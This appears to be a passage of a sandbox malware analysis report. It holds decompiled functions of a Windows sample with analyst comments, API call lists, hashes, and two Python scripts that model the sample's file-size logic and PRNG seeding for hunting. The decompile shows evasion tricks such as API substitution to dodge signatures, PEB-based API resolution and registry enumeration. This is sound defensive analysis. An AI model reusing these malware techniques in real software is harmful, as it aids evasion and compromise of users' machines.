                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: wsprintf$Module$CloseFileHandleNameOpenQueryValueVersion
                                                                                • String ID: PromptOnSecureDesktop$runas
                                                                                • API String ID: 3696105349-2220793183
                                                                                • Opcode ID: 6d5a3b4efbc2d97667e0e89406f7bd4dba45429abf12630261af7769a952681c
                                                                                • Instruction ID: 03442aab56affe776738d217652d29bf499ebc974a67126763565949ba301525
                                                                                • Opcode Fuzzy Hash: 6d5a3b4efbc2d97667e0e89406f7bd4dba45429abf12630261af7769a952681c
                                                                                • Instruction Fuzzy Hash: 53A171B2540208BBEB21DFA1CC45FDF3BACAB44344F104437FA05E6192D7B999848FA9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 614 406a60-406a89 CreateFileA 615 406b8c-406ba1 GetLastError 614->615 616 406a8f-406ac3 GetDiskFreeSpaceA 614->616 619 406ba3-406ba6 615->619 617 406ac5-406adc call 40eb0e 616->617 618 406b1d-406b34 call 406987 616->618 617->618 626 406ade 617->626 624 406b56-406b63 FindCloseChangeNotification 618->624 625 406b36-406b54 GetLastError CloseHandle 618->625 628 406b65-406b7d GetLastError CloseHandle 624->628 629 406b86-406b8a 624->629 627 406b7f-406b80 DeleteFileA 625->627 630 406ae0-406ae5 626->630 631 406ae7-406afb call 40eca5 626->631 627->629 628->627 629->619 630->631 632 406afd-406aff 630->632 631->618 632->618 634 406b01 632->634 636 406b03-406b08 634->636 637 406b0a-406b17 call 40eca5 634->637 636->618 636->637 637->618
                                                                                C-Code - Quality: 100%
                                                                                			E00406A60(int __edx, CHAR* _a4, intOrPtr _a8, int _a12) {
                                                                                				char _v5;
                                                                                				char _v6;
                                                                                				char _v7;
                                                                                				char _v8;
                                                                                				void* _v12;
                                                                                				long _v16;
                                                                                				long _v20;
                                                                                				long _v24;
                                                                                				intOrPtr _v28;
                                                                                				long _v32;
                                                                                				void* _t31;
                                                                                				int _t42;
                                                                                				intOrPtr _t43;
                                                                                				int _t44;
                                                                                				void* _t53;
                                                                                				int _t59;
                                                                                				CHAR* _t68;
                                                                                				void* _t69;
                                                                                				int _t73;
                                                                                
                                                                                				_t59 = __edx;
                                                                                				_t68 = _a4;
				// GENERIC_WRITE (0x40000000), no sharing, CREATE_ALWAYS (2), FILE_ATTRIBUTE_NORMAL (0x80): _a4 is the path being (over)written
				_t31 = CreateFileA(_t68, 0x40000000, 0, 0, 2, 0x80, 0); // executed
                                                                                				_v12 = _t31;
                                                                                				if(_t31 == 0xffffffff) {
					 *0x412180 = 0x61040101; // a status code and the Win32 error are recorded in two globals on every failure path of this routine
					 *0x41217c = GetLastError();
                                                                                					__eflags = 0;
                                                                                					return 0;
                                                                                				}
				_v8 =  *_t68; // the first three characters of the path ("X:\") plus a NUL form the root path handed to GetDiskFreeSpaceA
				_v7 = _t68[1];
				_t63 = _a12; // default size, kept when neither free-space threshold below is met
				_v6 = _t68[2];
				_v5 = 0;
				_t42 = GetDiskFreeSpaceA( &_v8,  &_v20,  &_v24,  &_v16,  &_v32); // executed; _v20 = sectors per cluster, _v24 = bytes per sector, _v16 = free clusters, _v32 = total clusters
                                                                                				if(_t42 == 0) {
                                                                                					L10:
					_t43 = E00406987(0x500000, _v12, _a8, _a12, _t63); // executed; _t63 is the size selected below (or the _a12 default)
                                                                                					_v28 = _t43;
                                                                                					if(_t43 != 0) {
						_t44 = FindCloseChangeNotification(_v12); // executed; called on a plain file handle in place of CloseHandle (both end in NtClose), likely to avoid API-name based signatures
                                                                                						__eflags = _t44;
                                                                                						if(_t44 != 0) {
                                                                                							L15:
                                                                                							return _v28;
                                                                                						}
                                                                                						 *0x412180 = 0x61040103;
                                                                                						 *0x41217c = GetLastError();
                                                                                						CloseHandle(_v12);
                                                                                						L14:
						DeleteFileA(_t68); // any failure after creation removes the partially written file
                                                                                						goto L15;
                                                                                					}
                                                                                					 *0x412180 = 0x61040102;
                                                                                					 *0x41217c = GetLastError();
                                                                                					CloseHandle(_v12);
                                                                                					goto L14;
                                                                                				}
				_t53 = E0040EB0E(_v20 * _v24, 0, _v16, 0); // 64-bit multiply: free bytes = (sectors per cluster * bytes per sector) * free clusters; low dword in _t53, high dword returned in edx (_t59)
                                                                                				_t69 = _t69 + 0x10;
                                                                                				_t73 = _t59;
                                                                                				if(_t73 < 0) {
                                                                                					goto L10;
                                                                                				}
				if(_t73 > 0 || _t53 > 0x6400000) { // more than 100 MiB free
					_t22 = E0040ECA5() % 0x500000 + 0xa00000; // 0xa00000: size = 10 MiB + (rand % 5 MiB), i.e. in [10 MiB, 15 MiB)
                                                                                					_t63 = _t22;
                                                                                					goto L10;
                                                                                				} else {
                                                                                					__eflags = _t59;
                                                                                					if(__eflags < 0) {
                                                                                						goto L10;
                                                                                					}
                                                                                					if(__eflags > 0) {
                                                                                						L9:
						_t63 = (E0040ECA5() & 0x001fffff) + 0x300000; // between 50 MiB and 100 MiB free: size = 3 MiB + (rand & 0x1fffff), i.e. in [3 MiB, 5 MiB)
                                                                                						__eflags = (E0040ECA5() & 0x001fffff) + 0x300000;
                                                                                						goto L10;
                                                                                					}
                                                                                					__eflags = _t53 - 0x3200000;
					if(_t53 <= 0x3200000) { // 50 MiB or less free: keep the _a12 default
                                                                                						goto L10;
                                                                                					}
                                                                                					goto L9;
                                                                                				}
                                                                                			}

                                                                                APIs
                                                                                • CreateFileA.KERNELBASE(?,40000000,00000000,00000000,00000002,00000080,00000000,74CF81D0,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406A7D
                                                                                • GetDiskFreeSpaceA.KERNELBASE(00409E9D,00409A60,?,?,?,PromptOnSecureDesktop,?,?,?,00409A60,?,?,00409E9D), ref: 00406ABB
                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B40
                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B4E
                                                                                • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B5F
                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B6F
                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B7D
                                                                                • DeleteFileA.KERNEL32(?,?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B80
                                                                                • GetLastError.KERNEL32(?,?,?,00409A60,?,?,00409E9D,?,?,?,?,?,00409E9D,?,00000022,?), ref: 00406B96
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseErrorLast$FileHandle$ChangeCreateDeleteDiskFindFreeNotificationSpace
                                                                                • String ID: PromptOnSecureDesktop
                                                                                • API String ID: 1251348514-2980165447
                                                                                • Opcode ID: f470ed9999743a5fb12dc2784f1c2880128520c421616f03f4739b26db8e28dc
                                                                                • Instruction ID: 425ce4a4a5363573a79131118f251082e1da2794364dd09a1208fe8084ee845e
                                                                                • Opcode Fuzzy Hash: f470ed9999743a5fb12dc2784f1c2880128520c421616f03f4739b26db8e28dc
                                                                                • Instruction Fuzzy Hash: C731E0B2900108BFDB00DFA09D44ADF7F78AF48310F158076E112F7291D674A9608F69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%
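The free-space thresholds and size formulas of E00406A60, restated as an analyst model so the size bands the dropped file can fall into are explicit. This is an added example, not code from the sample or from the report; the function names, the constructed volume geometry and the default size are this example's own, the constants (0x6400000, 0x3200000, 0x500000, 0xa00000, 0x1fffff, 0x300000) are the ones in the decompile.

```python
# Analyst model of the size selection in E00406A60 (added example, not code
# from the sample or from Joe Sandbox). Names are this example's own; the
# thresholds and formulas are copied from the decompiled routine.

MIB = 0x100000


def free_bytes(sectors_per_cluster, bytes_per_sector, free_clusters):
    """Free space as the sample derives it from the GetDiskFreeSpaceA outputs.

    E0040EB0E multiplies the 32-bit product sectors*bytes by the 32-bit free
    cluster count into a 64-bit value (low dword in _t53, high dword in _t59).
    """
    return (sectors_per_cluster * bytes_per_sector) * free_clusters


def choose_size(free, rand_value, default_size):
    """Byte count passed as the last argument to E00406987.

    free         64-bit free-space value (see free_bytes)
    rand_value   32-bit value returned by the E0040ECA5 generator
    default_size the caller's _a12, used when neither threshold is exceeded
    """
    hi = (free >> 32) & 0xFFFFFFFF
    lo = free & 0xFFFFFFFF
    if hi & 0x80000000:                      # _t73 < 0 (signed): falls through to the default
        return default_size
    if hi > 0 or lo > 0x6400000:             # more than 100 MiB free
        return rand_value % 0x500000 + 0xA00000      # 10 MiB + [0, 5 MiB)
    if lo > 0x3200000:                       # more than 50 MiB free
        return (rand_value & 0x1FFFFF) + 0x300000    # 3 MiB + [0, 2 MiB)
    return default_size


def size_band(free, default_size):
    """Half-open range of sizes reachable for a given amount of free space.

    Handy for a hunting condition on the written file's size: with more than
    100 MiB free it lands in [10 MiB, 15 MiB), with 50 to 100 MiB free in
    [3 MiB, 5 MiB), otherwise it is exactly default_size.
    """
    hi = (free >> 32) & 0xFFFFFFFF
    lo = free & 0xFFFFFFFF
    if hi & 0x80000000:
        return (default_size, default_size + 1)
    if hi > 0 or lo > 0x6400000:
        return (10 * MIB, 15 * MIB)
    if lo > 0x3200000:
        return (3 * MIB, 5 * MIB)
    return (default_size, default_size + 1)


if __name__ == "__main__":
    # Constructed input: 4 KiB clusters (8 sectors of 512 bytes), 51200 free clusters = 200 MiB.
    free = free_bytes(8, 512, 51200)
    print(hex(free), hex(choose_size(free, 0x123456, 0x1000)), size_band(free, 0x1000))
```

Because both random terms are bounded (modulo 5 MiB, or masked to 21 bits), the output size never identifies the exact PRNG output, but the band does tell a responder which branch the sample took and therefore roughly how much free space the victim volume had.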

                                                                                Control-flow Graph

                                                                                C-Code - Quality: 100%
                                                                                			E0040EC54() {
                                                                                				long _v8;
                                                                                				struct _FILETIME _v16;
                                                                                				signed int _t11;
                                                                                
				GetSystemTimeAsFileTime( &_v16);
				GetVolumeInformationA(0, 0, 4,  &_v8, 0, 0, 0, 0); // executed; NULL root path = volume of the current directory, only the serial number (_v8) is requested
				_t11 = (GetTickCount() ^ _v16.dwHighDateTime ^ _v8) & 0x7fffffff; // 31-bit seed from uptime, the coarse high half of the clock (advances about every 7 minutes) and the volume serial
				 *0x4136cc = _t11; // kept in a global, presumably the state consumed by the E0040ECA5 generator used elsewhere
                                                                                				return _t11;
                                                                                			}

                                                                                APIs
                                                                                • GetSystemTimeAsFileTime.KERNEL32(?), ref: 0040EC5E
                                                                                • GetVolumeInformationA.KERNELBASE(00000000,00000000,00000004,?,00000000,00000000,00000000,00000000), ref: 0040EC72
                                                                                • GetTickCount.KERNEL32 ref: 0040EC78
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Time$CountFileInformationSystemTickVolume
                                                                                • String ID:
                                                                                • API String ID: 1209300637-0
                                                                                • Opcode ID: 317f96d9bc7de3e67904a91eb6120da1bd741d4a36fd8a43a77db32c5f55538a
                                                                                • Instruction ID: 1673bc13977c8672636575d9c8a2f9c2942a42ce341afdc75306ae3be589e196
                                                                                • Opcode Fuzzy Hash: 317f96d9bc7de3e67904a91eb6120da1bd741d4a36fd8a43a77db32c5f55538a
                                                                                • Instruction Fuzzy Hash: 6BE0BFF5810104FFEB11EBB0EC4EEBB7BBCFB08315F504661B915D6090DAB49A448B64
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%
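The seed computation of E0040EC54, reimplemented so its inputs can be reproduced from values an analyst already has (the report's clock, the volume serial of the analysis VM) and the remaining unknown, the millisecond tick count, can be enumerated. This is an added example, not code from the sample or from the report; the function names and the sample values are this example's own, the formula is the decompiled one.

```python
# Analyst reimplementation of the PRNG seeding in E0040EC54 (added example,
# not code from the sample or from Joe Sandbox). Names are this example's own;
# the formula (GetTickCount ^ dwHighDateTime ^ VolumeSerialNumber) & 0x7fffffff
# is the decompiled one.

# Seconds between the FILETIME epoch (1601-01-01) and the Unix epoch (1970-01-01).
UNIX_EPOCH_OFFSET_S = 11644473600
# dwHighDateTime advances once every 2**32 * 100 ns, i.e. roughly every 7.2 minutes,
# so the clock contributes far less entropy than its 64-bit width suggests.
HIGH_DWORD_PERIOD_S = (1 << 32) * 100e-9


def filetime_from_unix(unix_seconds):
    """64-bit FILETIME (100 ns ticks since 1601) for a Unix timestamp in seconds."""
    return (unix_seconds + UNIX_EPOCH_OFFSET_S) * 10_000_000


def prng_seed(filetime, volume_serial, tick_count):
    """Value the sample writes to the global at 0x4136cc."""
    high = (filetime >> 32) & 0xFFFFFFFF          # _v16.dwHighDateTime
    return (tick_count ^ high ^ volume_serial) & 0x7FFFFFFF


def candidate_seeds(unix_seconds, volume_serial, tick_lo, tick_hi, step=1):
    """All seeds reachable for a known clock and serial over a tick-count window.

    GetTickCount is uptime in milliseconds; bounding it (for instance from the
    known uptime of a sandbox VM) turns the seed into a small enumerable set.
    """
    ft = filetime_from_unix(unix_seconds)
    return {prng_seed(ft, volume_serial, t) for t in range(tick_lo, tick_hi, step)}


if __name__ == "__main__":
    # Constructed values: 2023-02-20T00:00:00Z, an arbitrary serial and 65535 ms uptime.
    ft = filetime_from_unix(1676851200)
    print(hex(ft), hex(prng_seed(ft, 0x1234ABCD, 0xFFFF)))
    print(len(candidate_seeds(1676851200, 0x1234ABCD, 0, 60_000)), "seeds for the first minute of uptime")
```

The mask drops only bit 31, so distinct tick counts inside any window shorter than 2^31 ms give distinct seeds; the seed space is therefore bounded by how tightly the uptime can be pinned, not by the 31-bit output width.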

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 769 208092b-2080970 GetPEB 770 2080972-2080978 769->770 771 208097a-208098a call 2080d35 770->771 772 208098c-208098e 770->772 771->772 777 2080992-2080994 771->777 772->770 774 2080990 772->774 776 2080996-2080998 774->776 778 2080a3b-2080a3e 776->778 777->776 779 208099d-20809d3 777->779 780 20809dc-20809ee call 2080d0c 779->780 783 20809f0-2080a3a 780->783 784 20809d5-20809d8 780->784 783->778 784->780
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2080000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: .$GetProcAddress.$l
                                                                                • API String ID: 0-2784972518
                                                                                • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                • Instruction ID: 761247b40084aa777b878560d26c120f0ea522af0afc58718300f8bafaa69f72
                                                                                • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                • Instruction Fuzzy Hash: F5313BB6910709DFDB11DF99C880AAEBBF6FF48324F15405AD881A7310D771EA49CBA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 840 7b9ea4-7b9ebd 841 7b9ebf-7b9ec1 840->841 842 7b9ec8-7b9ed4 CreateToolhelp32Snapshot 841->842 843 7b9ec3 841->843 844 7b9ed6-7b9edc 842->844 845 7b9ee4-7b9ef1 Module32First 842->845 843->842 844->845 850 7b9ede-7b9ee2 844->850 846 7b9efa-7b9f02 845->846 847 7b9ef3-7b9ef4 call 7b9b63 845->847 851 7b9ef9 847->851 850->841 850->845 851->846
                                                                                APIs
                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 007B9ECC
                                                                                • Module32First.KERNEL32(00000000,00000224), ref: 007B9EEC
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.290625632.00000000007B6000.00000040.00000020.00020000.00000000.sdmp, Offset: 007B6000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7b6000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                • String ID:
                                                                                • API String ID: 3833638111-0
                                                                                • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                • Instruction ID: 7ed9fa93bfeb395ccc1d49839d94359ed700d51ed9063b94cd4428a3babcc52c
                                                                                • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                • Instruction Fuzzy Hash: 26F062335007116BD720BBF5A88DBAB76E8AF49725F100529E763954C0EB78EC458661
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E0040EBCC(long _a4) {
                                                                                				void* _t3;
                                                                                				void* _t7;
                                                                                
				_t3 = RtlAllocateHeap(GetProcessHeap(), 0, _a4); // executed; flags 0, so no HEAP_ZERO_MEMORY
				_t7 = _t3;
				E0040EB74(_t7); // queries HeapSize on the new block (see the subcall entries below)
                                                                                				return _t7;
                                                                                			}

                                                                                0x0040ebda
                                                                                0x0040ebe0
                                                                                0x0040ebe3
                                                                                0x0040ebec

                                                                                APIs
                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,80000001,0040EBFE,7FFF0001,?,0040DB55,7FFF0001), ref: 0040EBD3
                                                                                • RtlAllocateHeap.NTDLL(00000000,?,0040DB55,7FFF0001), ref: 0040EBDA
                                                                                  • Part of subcall function 0040EB74: GetProcessHeap.KERNEL32(00000000,00000000,0040EC28,00000000,?,0040DB55,7FFF0001), ref: 0040EB81
                                                                                  • Part of subcall function 0040EB74: HeapSize.KERNEL32(00000000,?,0040DB55,7FFF0001), ref: 0040EB88
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Heap$Process$AllocateSize
                                                                                • String ID:
                                                                                • API String ID: 2559512979-0
                                                                                • Opcode ID: ee98881387dc159fbc66546a2e4b1eb81700a9f94495ef156612fafc796680c8
                                                                                • Instruction ID: 42103369b453d960252fa070f8f6fdc0a0ffae9c693debdf4c74a5c852f77059
                                                                                • Opcode Fuzzy Hash: ee98881387dc159fbc66546a2e4b1eb81700a9f94495ef156612fafc796680c8
                                                                                • Instruction Fuzzy Hash: 54C0803210422077C60127A57C0CEDA3E74DF04352F084425F505C1160CB794880879D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 264 4073ff-407419 265 40741b 264->265 266 40741d-407422 264->266 265->266 267 407424 266->267 268 407426-40742b 266->268 267->268 269 407430-407435 268->269 270 40742d 268->270 271 407437 269->271 272 40743a-407481 call 406dc2 call 402544 RegOpenKeyExA 269->272 270->269 271->272 277 407487-40749d call 40ee2a 272->277 278 4077f9-4077fe call 40ee2a 272->278 284 407703-40770e RegEnumKeyA 277->284 283 407801 278->283 287 407804-407808 283->287 285 4074a2-4074b1 call 406cad 284->285 286 407714-40771d RegCloseKey 284->286 290 4074b7-4074cc call 40f1a5 285->290 291 4076ed-407700 285->291 286->283 290->291 294 4074d2-4074f8 RegOpenKeyExA 290->294 291->284 295 407727-40772a 294->295 296 4074fe-407530 call 402544 RegQueryValueExA 294->296 297 407755-407764 call 40ee2a 295->297 298 40772c-407740 call 40ef00 295->298 296->295 304 407536-40753c 296->304 309 4076df-4076e2 297->309 306 407742-407745 RegCloseKey 298->306 307 40774b-40774e 298->307 308 40753f-407544 304->308 306->307 312 4077ec-4077f7 RegCloseKey 307->312 308->308 311 407546-40754b 308->311 309->291 310 4076e4-4076e7 RegCloseKey 309->310 310->291 311->297 313 407551-40756b call 40ee95 311->313 312->287 313->297 316 407571-407593 call 402544 call 40ee95 313->316 321 407753 316->321 322 407599-4075a0 316->322 321->297 323 4075a2-4075c6 call 40ef00 call 40ed03 322->323 324 4075c8-4075d7 call 40ed03 322->324 330 4075d8-4075da 323->330 324->330 332 4075dc 330->332 333 4075df-407623 call 40ee95 call 402544 call 40ee95 call 40ee2a 330->333 332->333 342 407626-40762b 333->342 342->342 343 40762d-407634 342->343 344 407637-40763c 343->344 344->344 345 40763e-407642 344->345 346 407644-407656 call 40ed77 345->346 347 40765c-407673 call 40ed23 345->347 354 407769-40777c call 40ef00 346->354 352 407680 347->352 353 407675-40767e 347->353 356 407683-40768e call 406cad 352->356 353->356 359 4077e3-4077e6 RegCloseKey 354->359 361 407722-407725 356->361 362 407694-4076bf call 40f1a5 call 406c96 356->362 359->312 363 4076dd 361->363 368 4076c1-4076c7 362->368 369 4076d8 362->369 363->309 368->369 370 4076c9-4076d2 368->370 369->363 370->369 371 40777e-407797 GetFileAttributesExA 370->371 372 407799 371->372 373 40779a-40779f 371->373 372->373 374 4077a1 373->374 375 4077a3-4077a8 373->375 374->375 376 4077c4-4077c8 375->376 377 4077aa-4077c0 call 40ee08 375->377 379 4077d7-4077dc 376->379 380 4077ca-4077d6 call 40ef00 376->380 377->376 383 4077e0-4077e2 379->383 384 4077de 379->384 380->379 383->359 384->383
                                                                                C-Code - Quality: 76%
                                                                                			E004073FF(void* __ecx, intOrPtr* _a4, signed int* _a8, int** _a12, char* _a16, char* _a20) {
                                                                                				CHAR* _v8;
                                                                                				void* _v12;
                                                                                				int _v16;
                                                                                				void* _v20;
                                                                                				int* _v24;
                                                                                				char* _v28;
                                                                                				intOrPtr _v32;
                                                                                				int _v36;
                                                                                				char _v295;
                                                                                				char _v296;
                                                                                				char _v556;
                                                                                				void _v592;
                                                                                				intOrPtr* _t85;
                                                                                				int** _t86;
                                                                                				char* _t87;
                                                                                				char* _t88;
                                                                                				intOrPtr _t89;
                                                                                				char* _t91;
                                                                                				long _t92;
                                                                                				signed int _t93;
                                                                                				long _t97;
                                                                                				signed int _t103;
                                                                                				long _t107;
                                                                                				char* _t118;
                                                                                				intOrPtr* _t119;
                                                                                				CHAR* _t123;
                                                                                				void* _t125;
                                                                                				char* _t127;
                                                                                				intOrPtr* _t134;
                                                                                				void* _t136;
                                                                                				intOrPtr _t137;
                                                                                				signed int* _t146;
                                                                                				int** _t147;
                                                                                				void* _t160;
                                                                                				signed int _t163;
                                                                                				intOrPtr _t164;
                                                                                				void* _t165;
                                                                                				intOrPtr _t167;
                                                                                				intOrPtr _t172;
                                                                                				intOrPtr* _t173;
                                                                                				void* _t186;
                                                                                				intOrPtr _t187;
                                                                                				int* _t188;
                                                                                				void* _t190;
                                                                                				void* _t191;
                                                                                				char* _t192;
                                                                                				signed int _t194;
                                                                                				int* _t196;
                                                                                				void* _t202;
                                                                                				void* _t203;
                                                                                				void* _t204;
                                                                                				void* _t206;
                                                                                
                                                                                				_t165 = __ecx;
                                                                                				_t85 = _a8;
                                                                                				_t188 = 0;
                                                                                				_v16 = 0x104;
                                                                                				if(_t85 != 0) {
                                                                                					 *_t85 = 0;
                                                                                				}
                                                                                				_t86 = _a12;
                                                                                				if(_t86 != _t188) {
                                                                                					 *_t86 = _t188;
                                                                                				}
                                                                                				_t87 = _a16;
                                                                                				if(_t87 != _t188) {
                                                                                					 *_t87 = 0;
                                                                                				}
                                                                                				_t88 = _a20;
                                                                                				if(_t88 != _t188) {
                                                                                					 *_t88 = 0; // executed
                                                                                				}
                                                                                				_t89 = E00406DC2(_t165); // executed
                                                                                				_v32 = _t89;
                                                                                				_t160 = 0xe4;
                                                                                				_t91 = E00402544(0x4122f8, 0x4106e8, 0x22, 0xe4, 0xc8);
                                                                                				_t204 = _t203 + 0x14;
                                                                                				_t92 = RegOpenKeyExA(0x80000002, _t91, _t188, 0x20119,  &_v20); // executed
                                                                                				_push(0x100);
                                                                                				_push(_t188);
                                                                                				_push(0x4122f8);
                                                                                				if(_t92 != 0) {
                                                                                					_t93 = E0040EE2A(_t165);
                                                                                					goto L66;
                                                                                				} else {
                                                                                					E0040EE2A(_t165);
                                                                                					_t206 = _t204 + 0xc;
                                                                                					_push(_v16);
                                                                                					_push( &_v556);
                                                                                					_v24 = _t188;
                                                                                					_push(_t188);
                                                                                					while(1) {
                                                                                						_t97 = RegEnumKeyA(_v20, ??, ??, ??); // executed
                                                                                						if(_t97 != 0) {
                                                                                							break;
                                                                                						}
                                                                                						if(E00406CAD( &_v556) == 0) {
                                                                                							L41:
                                                                                							_v24 =  &(_v24[0]);
                                                                                							_push(0x104);
                                                                                							_v16 = 0x104;
                                                                                							_push( &_v556);
                                                                                							_push(_v24);
                                                                                							continue;
                                                                                						}
                                                                                						_t103 = E0040F1A5( &_v556);
                                                                                						_pop(_t167);
                                                                                						if((_t103 ^ 0x61616161) != _v32) {
                                                                                							goto L41;
                                                                                						}
                                                                                						_v12 = _t188;
                                                                                						_v16 = 0x104;
                                                                                						_t107 = RegOpenKeyExA(_v20,  &_v556, _t188, 0x101,  &_v12);
                                                                                						if(_t107 != _t188) {
                                                                                							L45:
                                                                                							if(_t107 != 5) {
                                                                                								L50:
                                                                                								E0040EE2A(_t167, 0x4122f8, _t188, 0x100);
                                                                                								_t206 = _t206 + 0xc;
                                                                                								L39:
                                                                                								if(_v12 != _t188) {
                                                                                									RegCloseKey(_v12);
                                                                                								}
                                                                                								goto L41;
                                                                                							}
                                                                                							E0040EF00(_a16,  &_v556);
                                                                                							if(_v12 != _t188) {
                                                                                								RegCloseKey(_v12);
                                                                                							}
                                                                                							_push(4);
                                                                                							_pop(0);
                                                                                							L64:
                                                                                							RegCloseKey(_v20);
                                                                                							return 0;
                                                                                						}
                                                                                						_t118 = E00402544(0x4122f8, 0x4106dc, 0xa, _t160, 0xc8);
                                                                                						_t206 = _t206 + 0x14;
                                                                                						_t107 = RegQueryValueExA(_v12, _t118, _t188,  &_v36,  &_v296,  &_v16);
                                                                                						if(_t107 != _t188) {
                                                                                							goto L45;
                                                                                						}
                                                                                						_t119 =  &_v556;
                                                                                						_t186 = _t119 + 1;
                                                                                						do {
                                                                                							_t167 =  *_t119;
                                                                                							_t119 = _t119 + 1;
                                                                                						} while (_t167 != 0);
                                                                                						if(_v16 <= _t119 - _t186) {
                                                                                							goto L50;
                                                                                						}
                                                                                						_t123 = E0040EE95( &_v296,  &_v556);
                                                                                						_pop(_t167);
                                                                                						_v8 = _t123;
                                                                                						if(_t123 == _t188) {
                                                                                							goto L50;
                                                                                						}
                                                                                						_t125 = E0040EE95(_v8, E00402544(0x4122f8, 0x410694, 5, _t160, 0xc8));
                                                                                						_t206 = _t206 + 0x1c;
                                                                                						if(_t125 == 0) {
                                                                                							_t188 = 0;
                                                                                							goto L50;
                                                                                						}
                                                                                						if(_v296 != 0x22) {
                                                                                							_t127 = E0040ED03( &_v296, 0x20);
                                                                                							_pop(_t167);
                                                                                						} else {
                                                                                							E0040EF00( &_v296,  &_v295);
                                                                                							_t127 = E0040ED03( &_v296, 0x22);
                                                                                							_t206 = _t206 + 0x10;
                                                                                						}
                                                                                						if(_t127 != 0) {
                                                                                							 *_t127 = 0;
                                                                                						}
                                                                                						_v8 = E0040EE95( &_v296,  &_v556);
                                                                                						_v28 = E0040EE95(_v8, E00402544(0x4122f8, 0x410694, 5, _t160, 0xc8));
                                                                                						E0040EE2A(_t167, 0x4122f8, 0, 0x100);
                                                                                						_t134 = _a4;
                                                                                						_t206 = _t206 + 0x30;
                                                                                						_t190 = _t134 + 1;
                                                                                						do {
                                                                                							_t172 =  *_t134;
                                                                                							_t134 = _t134 + 1;
                                                                                						} while (_t172 != 0);
                                                                                						_t173 = _v8;
                                                                                						_t191 = _t134 - _t190;
                                                                                						_t43 = _t173 + 1; // 0x1
                                                                                						_t136 = _t43;
                                                                                						do {
                                                                                							_t187 =  *_t173;
                                                                                							_t173 = _t173 + 1;
                                                                                						} while (_t187 != 0);
                                                                                						_t174 = _t173 - _t136;
                                                                                						if(_t191 <= _t173 - _t136 || E0040ED77(_t191 - _t174 + _a4, _v8) != 0) {
                                                                                							_t192 = _v28;
                                                                                							 *_t192 = 0;
                                                                                							_t137 = E0040ED23(_v8, 0x5c);
                                                                                							_v8 = _t137;
                                                                                							if(_t137 != 0) {
                                                                                								_v8 = _v8 + 1;
                                                                                							} else {
                                                                                								_v8 =  &_v296;
                                                                                							}
